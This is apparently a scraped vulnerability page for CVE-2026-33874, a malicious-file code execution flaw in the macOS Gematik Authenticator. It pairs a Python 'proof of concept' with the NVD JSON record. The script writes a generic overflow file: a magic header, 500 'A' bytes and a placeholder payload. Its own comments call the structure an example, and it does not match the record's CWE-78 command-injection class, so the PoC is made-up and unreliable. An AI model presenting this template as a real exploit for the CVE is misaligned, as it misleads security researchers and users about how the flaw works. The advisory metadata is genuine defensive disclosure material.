CVE-2026-33874

# Proof of Concept (PoC) for CVE-2026-33874 # This script generates a malicious file structure. # Usage: Run this script to generate 'exploit_file.bin', then open it with the vulnerable Gematik Authenticator. import struct def generate_malicious_file(filename): """ Generates a file with a specific pattern that triggers the vulnerability. The actual payload structure depends on reverse engineering of the file format. """ # Generic malicious header (example) magic_header = b"\x47\x45\x4d\x41" # Padding or specific pattern to reach the vulnerable buffer # Adjust length based on the actual offset discovered junk_buffer = b"A" * 500 # Simulated overwrite address or payload # In a real scenario, this would be a ROP chain or shellcode payload = b"\x41\x42\x43\x44" with open(filename, "wb") as f: f.write(magic_header) f.write(junk_buffer) f.write(payload) print(f"[*] Malicious file '{filename}' created successfully.") print(f"[*] Open this file with Gematik Authenticator < 4.16.0 on macOS to trigger the vulnerability.") if __name__ == "__main__": generate_malicious_file("exploit_file.bin")

{"cve": {"id": "CVE-2026-33874", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:24.213", "lastModified": "2026-04-21T19:16:17.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gematik Authenticator securely authenticates users for login to digital health applications. Starting in version 4.12.0 and prior to version 4.16.0, the Mac OS version of the Authenticator is vulnerable to remote code execution, triggered when victims open a malicious file. Update the gematik Authenticator to version 4.16.0 or greater to receive a patch. There are no known workarounds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gematik:authenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.12.0", "versionEndExcluding": "4.16.0", "matchCriteriaId": "8CABC71B-E563-463E-8D56-8FB5E430C88B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://github.com/gematik/app-Authenticator/security/advisories/GHSA-mjgm-7hwc-qqcr", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.machinespirits.de/advisory/2e655e/", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}